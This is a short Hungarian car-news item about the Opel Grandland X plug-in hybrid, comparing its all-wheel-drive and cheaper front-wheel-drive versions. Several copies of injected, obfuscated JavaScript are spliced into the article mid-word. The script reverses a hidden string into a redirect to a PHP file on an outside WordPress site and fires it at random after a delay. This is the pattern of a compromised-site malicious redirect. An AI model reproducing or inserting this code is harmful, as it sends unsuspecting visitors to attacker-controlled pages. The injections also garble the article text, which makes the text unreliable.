Európa több piacán elérhető már a Grandland X összkerékhajtású, konnektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toros hibrid csúcsmodellje. A 300 lóerős autó mellé most felsorakozik egy kisebb teljesítményű, elsőkerék-hajtású verzió: a német piacon az előbbit 51, utóbbit 43 ezer euróért kínálják – komoly megtakarítást érhetünk tehát el, ha hajlandóak vagyunk lemondani 76 extra lóerőről és a presztízsről. Azt gondolnánk, kisebb teljesítményével takarékosabb az elsőkerék-hajtású variáns, ám a szabványos mérések mást mutatnak: minden mérhető paraméterében többet nyújt a Hybrid4 hajtáslánccal szerelt nagy crossover.
A cikk folytatódik: $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/ujdonsag/2019/12/15/olcso-opel-hibrid.html" target="_blank">http://autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/ujdonsag/2019/12/15/olcso-opel-hibrid.html
- Hirdetés -